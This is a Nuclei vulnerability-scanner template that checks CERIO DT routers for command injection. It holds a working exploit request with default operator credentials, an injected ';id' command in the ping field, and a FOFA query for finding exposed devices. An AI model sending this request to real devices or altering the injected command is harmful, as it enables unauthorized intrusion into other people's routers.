nuclei-templates/http/vulnerabilities/other/cerio-dt-rce.yaml

39 lines
1.4 KiB
YAML
Raw Normal View History

2024-05-23 12:58:41 +00:00
id: cerio-dt-rce
info:
2024-05-24 06:21:58 +00:00
name: CERIO-DT Interface - Command Execution
2024-05-23 12:58:41 +00:00
author: pussycat0x
severity: critical
description: |
CERIO DT series routers have an operation command injection vulnerability in specific versions. An attacker could exploit this vulnerability to execute commands.
reference:
- https://github.com/20142995/sectool
- https://github.com/tanjiti/sec_profile
- https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md
metadata:
2024-05-24 06:21:58 +00:00
max-request: 1
verified: true
2024-05-23 12:58:41 +00:00
fofa-query: title="DT-100G-N" || title="DT-300N" || title="DT-100G" || title="AMR-3204G" || title="WMR-200N"
tags: cerio,rce
http:
- raw:
- |
POST /cgi-bin/Save.cgi?cgi=PING HTTP/1.1
Host: {{Hostname}}
Authorization: Basic b3BlcmF0b3I6MTIzNA==
Content-Type: application/x-www-form-urlencoded
pid=2061&ip=127.0.0.1;id&times=1
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: status
status:
- 200
# digest: 4b0a00483046022100f224cdd25f048596ecd1215e571598f1ebb9dcd7f38a628a14cf03e868e6f771022100e151ddd0d44531d2d80838a64578b6f86748aec1f806133b33cbc0d41ec6d3f3:922c64590222798bb761d5b6d8e72950